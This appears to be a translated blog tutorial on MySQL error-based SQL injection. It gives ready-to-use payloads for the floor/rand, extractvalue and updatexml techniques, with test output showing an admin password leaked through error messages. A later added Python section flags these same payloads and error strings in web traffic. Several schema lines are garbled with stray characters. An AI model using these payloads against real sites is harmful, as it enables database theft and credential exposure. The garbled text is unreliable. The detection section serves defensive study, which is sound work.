Posting some of my old notes. When MySQL executes a statement it throws an error message, and sites built on PHP+MySQL often display that error right on the page. This makes it possible to retrieve specific data by constructing queries using the following three methods.
Actual test environment:
" o- O5 ^9 _) N5 q* T/ f. U
" n' W6 Q8 H! A+ V. y+ Vmysql> show tables;
; ]0 r6 J" N Y: G+----------------+
* c z+ g% { r| Tables_in_test |
; O5 p; I5 l6 J+----------------+/ y6 L! c5 o5 _0 i: r7 m9 r1 _
| admin |, b; X, ^8 {+ n& Q% E; Q! n. f
| article |
% E$ J, `5 \% v# D" g$ {$ b+----------------+" x4 T! J9 B) }3 Z3 \+ z
" F3 j4 ?6 S, i! Z
2 t! m5 W) {& m, I& k+ F7 p ' ?* r% O* @6 z# n7 D2 h% @
mysql> describe admin;, s9 V" \ _2 e! M. A$ M- z* l
+-------+------------------+------+-----+---------+----------------+0 _. P9 W# R: x; n
| Field | Type | Null | Key | Default | Extra | m6 r& `( C9 Z, _
+-------+------------------+------+-----+---------+----------------+$ I. B' B0 @( K. t. }
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |7 ~/ A9 O5 E: k( x
| user | varchar(50) | NO | | NULL | |
6 p4 o. A: k: Q4 |/ @| pass | varchar(50) | NO | | NULL | |+ ]; p9 f! O7 b3 t" L
+-------+------------------+------+-----+---------+----------------+
/ B& s: w; b! o+ E! ?. ~
7 O9 f# m! I2 [5 w5 w6 U" }
+ T% J; N& r' ^( U! z
0 i/ {' P. C$ m" d8 @mysql> describe article;( r: f! g/ w* i: P o
+---------+------------------+------+-----+---------+----------------+
, Y4 B; Q9 f3 j" P| Field | Type | Null | Key | Default | Extra |
5 U. T3 A5 ?/ V% ?, Q+---------+------------------+------+-----+---------+----------------+
' z) k2 W- }1 a: e4 N% @| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
) g' P# l. ~* q| title | varchar(50) | NO | | NULL | |
) ~+ ~+ g4 I. m6 t/ t. q0 t! N$ P| content | varchar(50) | NO | | NULL | |( u3 ~( ]5 l6 _8 |, x7 g
+---------+------------------+------+-----+---------+----------------+
1. Triggering an error with floor()
The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
As you can see, the MySQL version is successfully leaked through the duplicate-key error. To retrieve other data, replace the expression in the position where version() sits.
For example, to retrieve the administrator's username and password:
Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
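A detection-side companion to the three methods above, added here as an example and not part of the original notes: it flags the floor/rand group-by, extractvalue and updatexml primitives in URL-encoded query strings, and the leaked MySQL error text (the 1062 duplicate 'group_key' and 1105 XPATH messages shown above) in response bodies. The traffic records are constructed for this example; the pattern names and function names are my own.

```python
import re
from urllib.parse import unquote_plus

# Error-based injection primitives from the notes above, matched
# case-insensitively after URL-decoding (payloads arrive encoded).
PAYLOAD_PATTERNS = {
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
}
# MySQL error text that leaks into the page when errors are displayed;
# its presence in a response body means data is flowing back via errors.
ERROR_PATTERNS = {
    "duplicate_group_key": re.compile(r"Duplicate entry '.*?' for key 'group_key'"),
    "xpath_syntax": re.compile(r"XPATH syntax error: '.*?'"),
}

def classify_request(query_string):
    # Decode twice so a double-encoded payload does not slip past the regexes.
    decoded = unquote_plus(unquote_plus(query_string))
    return [n for n, p in PAYLOAD_PATTERNS.items() if p.search(decoded)]

def classify_response(body):
    return [n for n, p in ERROR_PATTERNS.items() if p.search(body)]

# Constructed sample (request line, response body) pairs; not real traffic.
SAMPLE_TRAFFIC = [
    ("GET /article.php?id=1", "<h1>test</h1><p>do it</p>"),
    ("GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),"
     "concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables"
     "%20group%20by%20x)a)",
     "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'"),
    ("GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,"
     "(select%20pass%20from%20admin%20limit%201)))",
     "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'"),
    # Payload present but the page swallowed the error: still worth flagging.
    ("GET /article.php?id=1%20and%201%3D(UPDATEXML(1,concat(0x5e24,user(),0x5e24),1))",
     "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result"),
]

def scan(traffic):
    """Return (index, payload_hits, leaked_error_hits) for each suspicious record."""
    findings = []
    for i, (request, body) in enumerate(traffic):
        query = request.split("?", 1)[1] if "?" in request else ""
        req_hits, resp_hits = classify_request(query), classify_response(body)
        if req_hits or resp_hits:
            findings.append((i, req_hits, resp_hits))
    return findings
```

Running scan(SAMPLE_TRAFFIC) reports records 1 to 3; the last one shows why request-side matching matters even when the application does not echo the error back.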
That's all; thanks to the foreign guys.